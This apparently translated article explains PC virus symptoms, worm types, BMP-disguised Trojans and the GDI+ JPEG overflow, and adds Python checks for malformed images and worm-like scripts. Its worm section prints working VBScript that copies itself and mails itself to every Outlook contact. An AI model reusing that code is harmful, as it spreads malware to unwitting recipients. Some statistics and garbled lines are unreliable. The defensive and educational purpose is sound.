What about the virus in the computer?

First, how to judge whether your computer is infected with a virus? Computer failures are not only caused by virus infection; they are also caused by software and hardware faults of the computer itself, and network failures are mostly caused by permission settings. Only by fully understanding the difference and the connection between the two can we make a correct judgment and find a real virus in time. Below I list some common fault symptoms and, for each, the causes that point to a virus and the causes that point to a software or hardware fault.

1. Frequent crashes. Virus: viruses open many files or occupy a lot of memory. Software/hardware: unstable hardware (such as poor-quality memory or over-aggressive overclocking); running large software that takes up a lot of memory and disk space; using test software that still has many bugs; insufficient hard disk space, and so on. When software run over the network often crashes, the cause may be a slow network, a program that is too large, or a workstation whose hardware configuration is too low.

2. The system cannot start. Virus: the virus modified the boot information of the hard disk or deleted boot files (for example, a boot virus damaged the boot file). Software/hardware: the hard disk is damaged or its parameters are set incorrectly; system files were deleted by mistake, etc.

3. A file cannot be opened. Virus: the virus modified the file format or the file's link location. Software/hardware: the file is corrupted; the hard disk is damaged; the location a file shortcut points to has changed; the software originally used to edit the file has been deleted; on a local area network, the file's storage location on the server has changed and the workstation has not refreshed the new server contents (the Explorer window has been open for a long time).
4. Frequent "not enough memory" reports. Virus: the virus illegally occupies a lot of memory. Software/hardware: a lot of software is open; running software that demands memory; the system configuration is incorrect; memory itself is insufficient (the current basic requirement is 128M), and so on.

5. "Not enough disk space" prompts. Virus: the virus copied a large number of virus files (I have met this several times: a nearly 10G hard disk with only a WIN98 or WINNT4.0 system installed reported no free space, and software installation prompted that disk space was insufficient). Software/hardware: the hard disk partitions are too small; a large number of large-capacity software has been installed; all software is installed in one partition; the hard disk itself is small; on a local area network, the system administrator has set a space limit on each user's "private disk", and checking the size of the whole network disk shows that the "private disk" capacity has actually been used up.

6. Read/write activity on the floppy drive or other devices when nobody is accessing them. Virus: virus infection. Software/hardware: the floppy disk was removed while files on it were still open.

7. A large number of files of unknown origin appear. Virus: the virus copies files. Software/hardware: temporary files generated during the installation of some software; configuration information and run records of some software.

8. Black screen at start-up. Virus: virus infection (my deepest memory is April 26, 1998: CIH cost me several thousand yuan; the first time I started Windows that day it crashed, and nothing happened when I started it again). Software/hardware: monitor failure; graphics card failure; main board failure; overclocking; CPU damage, etc.

9. Data loss. Virus: the virus deleted files. Software/hardware: a hard disk sector is damaged; the original file was overwritten by a file recovery; for files on the network, another user may have deleted them by mistake.
Second, the types of worm virus.

1. Types of worm virus. On November 2, 1988, the world's first computer worm was officially born. Morris, a first-year graduate student at Cornell University, wrote an experimental program to verify whether a computer program could copy and spread itself between different computers. To get the program into other computers smoothly, he wrote a piece of code to crack users' passwords. At 5:00 on November 2 this program, called "Worm", started its journey. It truly lived up to Morris's expectations: it crawled into thousands of computers and crashed them, causing a record economic loss of 96 million dollars. Since then the word "worm" has spread, but Morris may not have known that in proving his conclusion he opened Pandora's box.

A. Mail worms. IFrame is an HTML element used to embed a small page inside a web page, to build a "frame" structure. At the time, a curious tester found a terrible phenomenon: when multiple IFrames were put into a page, code inside the frames that asked to run a program would be executed. If someone deliberately creates a page that runs a destructive program, the consequences can be imagined. Because the size of an IFrame can be set freely, a saboteur can put multiple "invisible" frames in a page and attach multiple "invisible" harmful programs, so whoever browses that page naturally becomes a victim! Compared with the IFrame vulnerability, the MIME vulnerability is more famous. MIME is actually just a small piece of data describing the type of information. By reading it, the browser knows how to deal with the data it received: text and pictures are displayed; a program triggers a download confirmation; music is played directly. Pay attention to the last type: music, for which the browser's action is: play.
B. Web-page worms. C. Social-engineering worms. D. System-vulnerability worms.

2. Several typical virus examples.

A. The oil painting. A strange oil painting was circulating on the Internet. It was said that many people hallucinated after looking at it. Some explained it as a visual stimulus caused by the colours of the composition, others as a psychological effect. Opinions varied, but there was no convincing answer. The two seemingly normal children on the screen were fascinating, and Xiao Wang, who opened it, did not notice that the page-loading progress bar in the status bar at the lower left of the IE browser never stopped. The CD-ROM tray popped out by itself; push it back and it popped out again. The mouse ran around and the keyboard did not respond. After a while the computer restarted and stayed forever at the error message "NTLDR lost …". Obviously this was another typical Trojan horse attack: what had been opened was not a picture at all. IE is very powerful: it can automatically identify and open a file of a specific format regardless of the file suffix, because IE judges the file content not by the suffix but by the file header and the MIME type. When a user opens a file, IE reads the file's header information and looks up the corresponding MIME format description in the local registry database. For example, when opening a MIDI file, IE first reads a piece of data at the front of the file; according to the standard definition of a MIDI file, it must contain descriptive information beginning with "RIFF". From this tag IE finds the MIME format "x-audio/midi" in the registry. IE then confirms that it cannot open this data itself, looks up in the registry which program opens files with the suffix ".MID", and hands the data to that program for execution; what we see is the final result. It is because of this principle that IE is easily fooled.
The same thing happened here: intruders hide worms in web pages by forging the MIME tag description. What Xiao Wang opened was actually an HTML page whose suffix had been changed to a picture format; it contained virus files exploiting the two vulnerabilities above and an IMG tag with height and width set to 100%, so people thought it was just a picture file. Behind this painting was an evil Trojan horse. The Trojan program was fairly large and took some time to download, which is why the IE progress bar never stopped. To make sure the victim downloads the complete Trojan file while the page is open, the intruder uses social engineering so that the victim does not close the page too soon.

B. Bitmap (BMP). He is a company's network administrator with plenty of experience in server maintenance and security settings, so he need not fear viruses that exploit browser vulnerabilities. One day, in a technical forum, he saw a post by a netizen about an operating defect in some AMD processors, with a link to a test page. According to the description, if the CPU you use is defective, the test pictures on the page will appear damaged and scrambled. He was surprised: this was the model of CPU he used. He immediately clicked the link. Looking at the scrambled picture on the page, he was relieved to have found out in time: there was something wrong with the CPU of this machine, and he had wanted to use it to process the company's important data! He immediately went to the management department to discuss it with the person in charge and set aside the machine that had shown the garbled picture. Management promised to replace the machine as soon as possible and let him move the hard disk over, since it contained important business information. When he came back, the picture was still displayed.
He closed the page in disgust and opened the folder where the information was stored, as usual. His mind went blank: the information was gone! Who deleted it? He frantically searched every corner of the hard disk, but the files seemed to have evaporated. After a long time he finally realised: the machine had been invaded! He took out the hard drive and went directly to a data recovery company. Afterwards he carefully analysed the cause. The machine had passed strict security testing and all patches were in place, so a web-page vulnerability or overflow attack was impossible. The only questionable thing was the so-called vulnerability test page. He quickly downloaded the whole page and analysed its code. Looking at an IMG tag whose source had the suffix ".BMP" and a pile of complicated script in the page source, he knew he had fallen victim to a BMP Trojan. The "defect test" picture shows the same "defect" on any machine, because it is not a picture file at all, but a Trojan program that starts with a BMP file header. Why does a seemingly harmless image file become a weapon that harms people? This starts with the bitmap format. Many readers know the long-standing "ciphertext" transmission method called "hiding text in a picture": a certain amount of data is appended at the end of a bitmap file without doing much damage to the original image, which is possible because of the loose restrictions of the bitmap format. The system does not examine a bitmap file strictly; it only reads the length, width, bit depth, file size and data-area length from the 54 bytes of the file header to complete image recognition. This relaxed check is what made the BMP Trojan possible. However, we must first clarify a concept.
A BMP Trojan is not an EXE file attached to the bottom of a BMP bitmap file; it is an independent EXE executable whose PE header has been replaced by a bitmap file header. Because of the system's check, the browser recognises the EXE file as a bitmap. And because it is "a bitmap", in the browser's program logic it is a file that needs to be downloaded to the Internet cache folder and then displayed on the page. But because the file is not really a bitmap, it naturally becomes a pile of meaningless junk data when forcibly displayed, a chaotic image in the eyes of the user. This is not the cause of the Trojan crisis, though. Note these words: "needs to be downloaded to the Internet cache folder"! This shows that the browser has invited the wolf into the house: the Trojan has settled on the hard disk, but it is still asleep, because its file header has been changed to bitmap format and it cannot run by itself. Since it cannot run, it certainly cannot harm the system. The file the wolf left on the hard disk would then be wasted, and the intruder will not let it go to waste. So when they make the page that downloads the Trojan through the browser, they also put page code in it that makes the browser take off the wolf's coat. After these steps, a bad wolf has entered the system. This irreparable fragility is terrifying. It is difficult for users to know whether the page they are browsing is secretly downloading Trojan data, because even if they have applied every patch it will not help: the Trojan was downloaded "legitimately" by IE, and it is not a code vulnerability. Moreover, it is difficult for the program itself to judge whether this image is a Trojan. A machine does not hand retinal images to a brain for judgment; it completes the processing in binary and nothing more.
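Both IE's content sniffing (the MIDI example under the oil painting) and the BMP Trojan rest on how little of the file header is actually checked. The Python below is an added example, not the article's own code or any vendor's: sniff() recognises a file by its leading bytes the way the browser does, extension_mismatch() flags a file name whose extension disagrees with its content, and validate_bmp() applies the sanity checks the article says the system skips, comparing the declared sizes in the 54-byte header with the bytes actually present and looking behind the header for the DOS-stub text and PE signature that a Windows executable carries. The sample files are constructed byte strings built in the script.

```python
"""Magic-byte sniffing plus structural sanity checks for BMP headers."""
import struct

# Leading bytes of the formats discussed in the article.
MAGIC = {
    "bmp": (b"BM",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "mid": (b"RIFF", b"MThd"),  # RIFF-wrapped MIDI or a raw standard MIDI file
    "exe": (b"MZ",),
    "html": (b"<!DOCTYPE", b"<html", b"<HTML"),
}


def sniff(data):
    """Return the sorted list of extensions whose magic bytes match the start of `data`."""
    return sorted(ext for ext, sigs in MAGIC.items()
                  if any(data.startswith(s) for s in sigs))


def extension_mismatch(filename, data):
    """True when the content is recognised and the name's extension is not one of those formats."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    looks_like = sniff(data)
    return bool(looks_like) and ext not in looks_like


def validate_bmp(data):
    """Return the list of problems found in a BMP file (empty means self-consistent).

    Reads the 14-byte file header and 40-byte info header and checks that the
    declared file size, pixel-data offset and image size agree with the bytes
    actually present, then looks for executable remnants behind the header.
    """
    problems = []
    if len(data) < 54:
        return ["file shorter than the 54-byte BMP header"]
    if data[:2] != b"BM":
        return ["missing 'BM' signature"]
    bf_size, _res1, _res2, off_bits = struct.unpack_from("<IHHI", data, 2)
    (bi_size, width, height, planes, bpp,
     compression, size_image) = struct.unpack_from("<IiiHHII", data, 14)
    if bf_size != len(data):
        problems.append("header says %d bytes, file has %d" % (bf_size, len(data)))
    if bi_size != 40:
        problems.append("unexpected info header size %d" % bi_size)
    if planes != 1 or bpp not in (1, 4, 8, 16, 24, 32):
        problems.append("implausible planes/bpp %d/%d" % (planes, bpp))
    if off_bits < 54 or off_bits > len(data):
        problems.append("pixel data offset %d outside file" % off_bits)
    elif compression == 0 and width > 0 and height != 0:
        row = (width * bpp + 31) // 32 * 4        # rows are padded to 4 bytes
        expected = row * abs(height)
        if size_image not in (0, expected):       # 0 is allowed for uncompressed images
            problems.append("declared image size %d, geometry needs %d" % (size_image, expected))
        if off_bits + expected > len(data):
            problems.append("pixel data runs %d bytes past end of file"
                            % (off_bits + expected - len(data)))
    # Pixel data of a real bitmap has no business carrying a DOS stub or a PE signature.
    tail = data[54:]
    if b"This program cannot be run in DOS mode" in tail or b"PE\0\0" in tail:
        problems.append("executable markers inside pixel data")
    return problems


def make_bmp(width, height, pixels):
    """Build a minimal uncompressed 24-bit BMP (constructed test data)."""
    row = (width * 24 + 31) // 32 * 4
    size_image = row * height
    info = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, size_image, 2835, 2835, 0, 0)
    file_hdr = struct.pack("<2sIHHI", b"BM", 54 + size_image, 0, 0, 54)
    return file_hdr + info + pixels


GOOD_BMP = make_bmp(2, 2, bytes(16))  # 2x2 pixels, 8-byte rows, 70 bytes in all
# Constructed stand-in for the Trojan pattern: the bitmap header of GOOD_BMP glued
# onto bytes that still carry an executable's DOS-stub text and PE signature.
FAKE_BMP = (GOOD_BMP[:54] + b"This program cannot be run in DOS mode.\r\n$"
            + bytes(20) + b"PE\0\0\x4c\x01" + bytes(300))

if __name__ == "__main__":
    for name, blob in (("good.bmp", GOOD_BMP), ("cputest.bmp", FAKE_BMP)):
        print(name, "mismatch:", extension_mismatch(name, blob),
              "problems:", validate_bmp(blob))
```

Note what the two checks show when run together: extension_mismatch() accepts the fake file, because a forged "BM" header satisfies magic-byte sniffing exactly as the article describes, while validate_bmp() rejects it on two grounds (declared size versus real size, and executable markers in the pixel area). A cache or proxy that drops images failing the second check denies the "legitimate download" step the Trojan depends on.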
However, because this is also an intrusion method that requires downloading a file, whether it is downloaded and whether users are willing to look at the page depends on the intruder's social engineering. Unless a "privacy statement" or some other trick that arouses people's interest is used, posting a scrambled picture or a hidden picture frame on any page is not the wisest choice. The reason that company's network administrator was so unprepared is that the attacker exploited a "psychological blind spot": because people are particularly sensitive to content about security, vulnerabilities and viruses, the intruder posted a professional-looking vulnerability case and deceived many people. This time he used a real event, that some models of AMD CPU cause image problems; what will he use as bait next time?

C. The devil's curse (JPEG, GIF). For most users of an entertainment forum, today was a black day, because after they viewed an oil painting post titled "Cursed Eyes", their systems were destroyed for unknown reasons. The forum's technical staff immediately analysed the post many times, but the whole page held only one JPEG picture link, and no other malicious code or program existed at all. What did the intruder do to destroy the users' machines? Was it really this JPEG picture? I'm afraid the answer is hard to accept: it was indeed this JPEG image that infected users with the virus. Virus research has never stopped, but development to this point is really hard to bear: will you be infected next by opening a text file? A virus carried by a picture really made everyone sweat. As we all know, pictures in JPEG, GIF and other formats do not have the conditions for self-execution and virus transmission, so this seems illogical.
Looking back at the events of September 14, 2004: Microsoft issued security bulletin MS04-028, "Buffer overflow in JPEG processing (GDI+) may enable code execution". Yes, this is the vulnerability. The component is GDI+, and the corresponding dynamic link library is GdiPlus.dll. It is a graphics device interface that provides two-dimensional graphics, images and layout for applications and programmers. Most Windows programs call this DLL to process JPEG pictures. Now this widely used component had become the target of public criticism. At this point the reader should understand that it is not the picture itself that spreads the virus: the system module responsible for graphics processing overflows when processing the picture, and as a result the malicious instructions carried in the picture are executed. If a picture tool uses its own processing module instead of calling this system module, a picture that contains the same malicious instructions cannot achieve its destructive purpose. But because this system module is the default processing module, most programs fell before the "JPEG virus". How did this overflow come about? This starts with how the system reads JPEG graphics. When the system processes a JPEG image, it loads the JPEG processing module into memory, and the module then reads the image data into the memory space it occupies, the so-called buffer; finally we see the image displayed. However, an error occurs when the image data enters the buffer: Windows specifies the size of the buffer, but the actual amount of data is not strictly checked. This flawed boundary check leads to a nightmare. The intruder makes the data of a JPEG image extremely large and adds malicious instructions, so what happens when the system loads the image into memory?
The image data fills the whole buffer provided by the JPEG processing module and spills the malicious instructions into the memory area of the program itself, the area used to execute instructions, that is, the core area, so the program wrongly executes the malicious instructions, and the intruder's destruction of the system or invasion of the machine proceeds as planned. Some may wonder: are intruders all divine operators? How can they know exactly which data will overflow and be executed? The answer is simple: when Windows allocates the space of the JPEG processing module, the starting address of the memory allocated to it is fixed, so the intruder can work out which data will be executed by calculating the size of the space, which is why the JPEG virus spread quickly. The so-called JPEG virus does not mean that JPEG images release viruses; it means that the system's JPEG processing module executes the virus carried in the JPEG image, so we do not have to panic. As long as the hole in GDIPLUS.DLL is plugged, even if every JPEG image on your machine contains virus data, none of it can escape and cause damage. As Austin, an assistant professor at Massachusetts State University, said: "Viruses are not just self-replicating code; they need to spread through executable code. JPEG files cannot execute code; they are data files opened by application software. The application software will not look for executable code in a data file, so it will not run this virus code."

Worms are the biggest threat to individual users, the most difficult to eradicate, and the cause of the greatest losses. For individual users, threatening worms usually spread through e-mail and malicious web pages. Worms that spread by email usually rely on social engineering; malicious web pages induce users to click through various deceptive means.
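The "actual amount of data is not strictly checked" failure described for GDI+ is, concretely, a length field that the decoder trusts. The Python below is an added example, not code from the article, Microsoft or any decoder: it walks the marker segments of a JPEG header and refuses any segment whose declared length is below the two bytes the field itself occupies (the under-flow case at the heart of MS04-028, where a comment segment with length less than 2 turned length-minus-2 into a huge copy) or runs past the end of the file. The three sample files are constructed in the script; a real image would be read from disk in place of GOOD_JPEG.

```python
"""Walk JPEG marker segments and reject any whose declared length is inconsistent."""
import struct

SOI, EOI, SOS, COM, APP0 = 0xD8, 0xD9, 0xDA, 0xFE, 0xE0
# Markers that carry no length field.
STANDALONE = {0x01, SOI, EOI} | set(range(0xD0, 0xD8))


def walk_segments(data):
    """Return (segments, error).

    segments: list of (marker, offset, declared_length) for each segment up to
    and including the SOS marker; error: None, or a message for the first
    segment whose length field cannot be trusted.
    """
    segs = []
    if data[:2] != b"\xff\xd8":
        return segs, "missing SOI marker"
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return segs, "expected marker at offset %d" % pos
        marker = data[pos + 1]
        if marker == 0xFF:              # 0xFF fill bytes may precede a marker
            pos += 1
            continue
        if marker in STANDALONE:
            segs.append((marker, pos, 0))
            if marker == EOI:
                return segs, None
            pos += 2
            continue
        if pos + 4 > len(data):
            return segs, "truncated length field at offset %d" % pos
        length = struct.unpack_from(">H", data, pos + 2)[0]
        # The length counts its own two bytes, so anything below 2 is the
        # under-flow case: length - 2 would wrap to a huge copy size.
        if length < 2:
            return segs, ("segment 0x%02X at offset %d declares length %d, below the 2-byte minimum"
                          % (marker, pos, length))
        if pos + 2 + length > len(data):
            return segs, ("segment 0x%02X at offset %d runs %d bytes past end of file"
                          % (marker, pos, pos + 2 + length - len(data)))
        segs.append((marker, pos, length))
        if marker == SOS:
            return segs, None           # entropy-coded data follows; header walk done
        pos += 2 + length
    return segs, "ran off the end without EOI"


def is_safe_jpeg(data):
    """True when every header segment's length field is consistent with the file."""
    return walk_segments(data)[1] is None


def _segment(marker, payload):
    """Build one marker segment with a correct length field (for constructed samples)."""
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed samples: a well-formed header, a COM segment with the under-flowing
# length 1, and a COM segment whose length points far beyond the end of the file.
GOOD_JPEG = (b"\xff\xd8"
             + _segment(APP0, b"JFIF\0\x01\x01\0\0\x01\0\x01\0\0")
             + _segment(COM, b"harmless comment")
             + _segment(SOS, b"\x01\x01\x00")
             + b"\x12\x34\xff\xd9")
UNDERFLOW_JPEG = b"\xff\xd8\xff\xfe\x00\x01" + b"\x90" * 64
OVERRUN_JPEG = b"\xff\xd8\xff\xfe\xff\xff" + b"\x90" * 64

if __name__ == "__main__":
    for name in ("GOOD_JPEG", "UNDERFLOW_JPEG", "OVERRUN_JPEG"):
        segs, err = walk_segments(globals()[name])
        print(name, "segments:", [(hex(m), off, ln) for m, off, ln in segs], "error:", err)
```

The walker stops at the SOS marker on purpose: what follows is entropy-coded scan data with its own escaping rules, and the length-field problem the article describes lives in the header segments before it. A gateway that runs this check before handing a file to the system decoder turns the article's advice ("plug the hole in GDIPLUS.DLL") into a second line of defence for machines that have not yet been patched.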
Specifically, it is malicious code written by a hacker and embedded in a web page; when a user unknowingly opens a page containing the virus, it breaks out. The principle of this code-embedding technique is not complicated, so many people with ulterior motives use it. Forums on using web pages for destruction have appeared on many hacker websites, and destructive program code can be downloaded from them, which has caused a large-scale flood of malicious web pages and losses for more and more users. Malicious web pages are often programmed in VBScript and JavaScript, because the programming is simple, which is why they are so popular on the Internet. VBScript and JavaScript are parsed and executed by WSH (Windows Script Host) of the Microsoft operating system. Because of that simplicity, such script viruses spread wildly on the Internet. The notorious Love Bug virus was a VBS script virus, disguised as an email attachment to lure users into running it. What is even more frightening is that this kind of virus appears in source-code form, and anyone who knows a little scripting can modify the code to form a variant. Let's take a simple script as an example:

Set objFS = CreateObject("Scripting.FileSystemObject")   ' create a file system object
objFS.CreateTextFile "c:\virus.txt", 1                    ' create a text file through that object

If we change the second line to

objFS.GetFile(WScript.ScriptFullName).Copy "c:\virus.vbs"

the script copies itself to the file virus.vbs on drive C. The file system object was created by the line before it; WScript.ScriptFullName is the full path and file name of the running script itself, GetFile obtains that file, and Copy copies it to virus.vbs in the root directory of drive C.
In such a simple statement, self-replication is realised, and the script already has the basic feature of a virus: self-replication. Such viruses often spread by mail, and calling the mail-sending function from VBScript is also very simple. The virus typically spreads by sending an email carrying itself to every address in the Outlook address book. A simple example:

Set objOA = WScript.CreateObject("Outlook.Application")   ' create the Outlook application object
Set objMapi = objOA.GetNamespace("MAPI")                   ' get the MAPI namespace
For i = 1 To objMapi.AddressLists.Count
    Set objAddList = objMapi.AddressLists(i)
    For j = 1 To objAddList.AddressEntries.Count
        Set objMail = objOA.CreateItem(0)                   ' create a mail item
        objMail.Recipients.Add objAddList.AddressEntries(j) ' the recipient's e-mail address
        objMail.Subject = "Hello!"                          ' the subject is usually chosen to be tempting
        objMail.Body = "The attachment for you this time is my new document!"   ' the body text
        objMail.Attachments.Add "c:\virus.vbs"              ' spread itself as an attachment
        objMail.Send
    Next
Next
Set objMapi = Nothing    ' release the objMapi variable and its resources
Set objOA = Nothing

The first line of this code creates an Outlook object, which is essential. What follows is a loop that keeps sending letters with the same content to the mailboxes in the address book. This is how the worm spreads. It can be seen that writing viruses in VBScript is very easy, which makes such viruses diverse and destructive, and very difficult to eradicate!

Third, individual users' preventive measures against worms. From the above analysis we can see that viruses are not terrible: network worms attack individual users mainly through social engineering rather than by exploiting system vulnerabilities! Therefore, pay attention to the following points to prevent this kind of virus:
1. Anti-virus software must be installed. Rising integrates anti-virus software with a strong firewall function, which greatly inhibits worms and Trojan horses.

2. Upgrade the virus database often. Anti-virus software works from virus signatures, and new viruses appear every day; in the Internet age worms spread fast and have many variants, so the database must be updated at any time in order to kill the latest viruses, usually once a week or more. However, because the anti-virus software we install is usually installed on several machines, I sometimes fail to upgrade, since the number of upgrades per day for one ID number is limited. If this happens, we can upgrade another day, which solves the problem.

3. Raise anti-virus awareness. Don't click on strange websites casually; they may contain malicious code!

4. Don't open unfamiliar emails at will, especially emails with attachments. Because some virus mails can execute automatically by exploiting holes in IE and Outlook, computer users need to upgrade IE, Outlook and other commonly used applications!

5. Get into the habit of upgrading the system frequently. Specific methods: A. Set the Start menu to classic mode, then click the Windows Update item in the Start menu and follow the instructions to complete the upgrade. B. You can also configure automatic updates (this method is not recommended).

6. Don't trust the pictures and websites recommended to you in QQ; these things are often sent to you by your friends (netizens).

7. Develop good computer habits and back up important data.

8. Don't believe messages sent through the system messenger asking you to visit unknown websites.
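The self-copying and mass-mailing snippets in the worm section give a defender concrete things to look for, and a check of that kind belongs beside the "don't open strange attachments" advice above. The Python script below is an added example, not from the article or any product: it scans VBScript source for the indicators those snippets rely on (a reference to the running script's own path combined with a file copy; Outlook automation combined with address-book enumeration and a Send call) and reports a verdict only when the indicators combine, since each one alone has legitimate uses. The two sample scripts are constructed; the suspicious one strings together the lines the article's snippets use.

```python
"""Static indicator scan for VBScript files, aimed at self-copying and mass-mailing worms."""
import re

# VBScript is case-insensitive, so every pattern is matched ignoring case.
INDICATORS = {
    "self_reference": re.compile(r"WScript\.ScriptFullName", re.I),
    "file_copy": re.compile(r"\.Copy\b|\.CopyFile\b", re.I),
    "outlook_automation": re.compile(r'CreateObject\s*\(\s*"Outlook\.Application"', re.I),
    "address_book": re.compile(r'AddressLists|AddressEntries|GetNamespace\s*\(\s*"MAPI"', re.I),
    "attachment": re.compile(r"Attachments\.Add", re.I),
    "send_mail": re.compile(r"\.Send\b", re.I),
}


def scan_vbs(source):
    """Return {'hits': {indicator: bool}, 'verdicts': [...]} for one script's text.

    A script that reads its own path and copies a file is flagged as
    self-replicating; one that drives Outlook, walks the address book and
    sends is flagged as mass-mailing. Single indicators on their own are
    reported but do not produce a verdict, because each has legitimate uses.
    """
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS.items()}
    verdicts = []
    if hits["self_reference"] and hits["file_copy"]:
        verdicts.append("self-replication")
    if hits["outlook_automation"] and hits["address_book"] and hits["send_mail"]:
        verdicts.append("mass-mailing")
    return {"hits": hits, "verdicts": verdicts}


# Constructed samples. The first is an ordinary log-reading admin script; the
# second strings together the lines the article's two snippets rely on.
BENIGN_SCRIPT = r'''Set objFS = CreateObject("Scripting.FileSystemObject")
Set f = objFS.OpenTextFile("c:\logs\backup.log", 1)
WScript.Echo f.ReadAll
f.Close'''

SUSPECT_SCRIPT = r'''Set objFS = CreateObject("Scripting.FileSystemObject")
objFS.GetFile(WScript.ScriptFullName).Copy "c:\virus.vbs"
Set objOA = WScript.CreateObject("Outlook.Application")
Set objMapi = objOA.GetNamespace("MAPI")
For i = 1 To objMapi.AddressLists.Count
    objMail.Attachments.Add "c:\virus.vbs"
    objMail.Send
Next'''

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_SCRIPT), ("suspect", SUSPECT_SCRIPT)):
        result = scan_vbs(text)
        flagged = [k for k, v in result["hits"].items() if v]
        print(label, "indicators:", flagged, "verdicts:", result["verdicts"])
```

Run it over the .vbs attachments a mail gateway quarantines, or over a user's download folder, and treat any verdict as a reason to hold the file; the individual hits are worth logging too, because the article's point that anyone can edit a script into a variant means the exact lines will differ while the combination of capabilities stays the same.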

Viruses will always try their best to invade our computers and destroy them. Even with anti-virus software installed, do not neglect the usual preventive work. "Keeping the enemy outside the border" is the ideal, so it is suggested that everyone adopt the principle of "prevention first" in dealing with viruses. I hope the following anti-virus views are useful to everyone.

1. Make an emergency disk first.

It is very necessary to make a virus-free system emergency start-up disk. It is best to copy an anti-virus program and some practical tools to this disk, and then turn off write protection.

2. Mind the entrance

When we have something useful, we all like to share it with friends. From experience, we suggest that you do not start the system from a floppy disk before scanning it for viruses. Have you noticed that more than 90% of viruses are boot viruses? Don't execute unverified compressed files, such as files downloaded from the Internet (you can also consider _). Also, be careful with email attachments (even if some of them appear on the surface to be plain text), and even if they are sent by friends, don't double-click to run them.

3. Implement backup

The documents we work so hard to create in our daily work, and all kinds of material collected from the Internet, are the fruits of your labour. Back them up at least once a week, preferably to a different place (that is, a storage device other than your computer, such as a floppy disk or a USB mobile hard disk). Then, when files on the computer are destroyed by a virus, the backup will be of great use. Of course, before that you must make sure your backup files are "clean".

4. "My computer"

You had better not let others touch your personal computer casually: novices will always "mishandle" something, and experts will inevitably want to borrow your beloved machine to try some tricks they have just "studied". Either way, your data may be lost in an instant, and it will be too late to cry! So at the very least you should prevent others from using their own floppy disks or CDs on your computer, whether intentionally or not.

5. Be alert to abnormal situations

A word of advice: when using the computer, pay close attention to its performance. If you notice abnormal symptoms, such as snail-slow speed, reports of insufficient memory on a 256MB machine, files you have never seen suddenly appearing, or familiar files growing or shrinking in length, your first reaction should be: infected!!! At that point you must stop what you are doing and kill the virus immediately. Don't be careless; otherwise your losses will only get worse. If the system crashes and everything goes up in smoke, it will be too late for regrets!

6. Don't forget to upgrade

Installing anti-virus software is not a once-and-for-all solution; don't let a virus sneak into the system under the nose of the anti-virus software. So always read anti-virus reports or visit the anti-virus vendor's web page frequently to learn the latest virus activity trends, update the virus-killing signatures and upgrade your anti-virus software.